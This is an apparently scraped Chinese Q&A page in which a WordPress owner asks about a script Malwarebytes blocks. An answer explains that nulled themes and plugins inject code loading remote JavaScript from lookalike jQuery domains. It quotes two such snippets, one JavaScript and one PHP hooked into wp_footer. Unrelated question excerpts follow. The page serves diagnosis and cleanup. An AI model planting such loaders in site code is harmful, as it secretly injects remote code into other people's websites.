从wordpress站点删除脚本
我使用恶意软件字节,每次我访问我的wordpress网站,它阻止一个脚本试图在页面上运行,脚本是:
<script type="text/javascript">
if (!document.referrer || document.referrer == '') {
document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.min.js"></scr' + 'ipt>');
} else {
document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.js"></scr' + 'ipt>');
}
</script>
我不确定它是否是恶意的,但我想删除它,但是我不知道是哪个插件或文件导致了它,我试图查看页面源等。
剧本的意思是什么?有没有办法找出是什么原因造成的?
任何帮助都将不胜感激。
共有2个答案
您可以在wordpress目录中使用此问题中提出的应用程序之一搜索此脚本:无需索引即可搜索文件内字符串的工具。
您使用的是wordpress插件或主题,可能是从“空”主题和插件库下载的。
几乎所有这样的网站都采用了一种商业模式,通过这种模式,他们提供的主题和插件通常免费5美元至75美元。
但俗话说,天下没有免费的午餐。作为免费插件/主题的交换,网站所有者添加了代码,其中包括一个来自外部域的js文件,该文件向您的网站添加了横幅。
为了防止网站管理员或开发人员立即注意到这些横幅(或只是一个或三个反向链接),任何以管理员身份登录的人或/或任何没有推荐人url的人都不会显示广告。
在你的例子中,有效载荷是从一个类似于真实事物的域中包含的,从而愚弄了足够多没有经验的Wordpress网站管理员,使其成为属于jQuery的东西。jQuery官方CDN位于这里//code.jQuery.com/
确保检查所有来自阴暗处的主题或插件是否有类似的代码,这些代码也可能在图像文件中,尽管通常在init.php或functions.php中。下面是另一个使用jquery域的不同变体的类似代码示例。
if(!function_exists('wp_func_jquery')) {
function wp_func_jquery() {
$host = 'http://';
$jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
if (@fopen($jquery,'r')){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
add_action('wp_footer', 'wp_func_jquery');
}
-
本文向大家介绍使用 Iisftp.vbs 删除FTP站点,包括了使用 Iisftp.vbs 删除FTP站点的使用技巧和注意事项,需要的朋友参考一下 应用到: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1 可以使用命令行脚本 iisftp.vbs(存储在 systemroot\System32\ 中
-
使用指南 - 账户管理 - 站点管理 - 站点的暂停与删除 在管理->网站列表中,站点的右侧“更多设置”处可以对指定站点进行暂停数据统计、以及删除站点操作。 暂停数据统计 暂停后,百度统计将不会再收集站点的数据产出分析报表,直至重新启用。 删除站点 如果删除了站点,该网站的所有历史数据将被清空且无法恢复,请您谨慎操作! 如果有汇总网站包含该网站,则相关的汇总网站的数据也会变化。
-
大约6个月前,我创建了一个wordpress网站。一切都很好,直到几天前,我们开始在前端和后端看到Wordpress“白色死亡屏幕”。 经过大量调试尝试后,我们决定重新安装wordpress并保留旧的wp-内容文件。 现在,在尝试访问站点时可以看到这一点(wp_debug设置为false,因此理想情况下不应该发生)- > 警告:require(/home/vaidya/public_html/wp
-
我们有一个要求,需要实现以下内容:我们应该被重定向到https://localhost:9002/baseSiteID/。但我们有一个要求,即URL应解析为https://localhost:9002/。不应在URL中追加基组id。 我们有以下更改。
-
通常我可以做到这一点,没有任何问题,但我删除了一些语法在这里,当我继续并删除日期从页面标题在这段代码: 如何删除日期而不删除整个页面?
-
我正在尝试从此API获取数据: 我设法使用wp_remote_get()来提出请求,但我一直没有得到任何结果,除了一个错误: 我只是指出,我已经使用了作曲家来设置作曲家。我的XAMPP适当文件夹中的json文件,其中包含请求: 在我的代码中,我包括API密钥的参数,如下所示,但由于某些原因,该参数不起作用: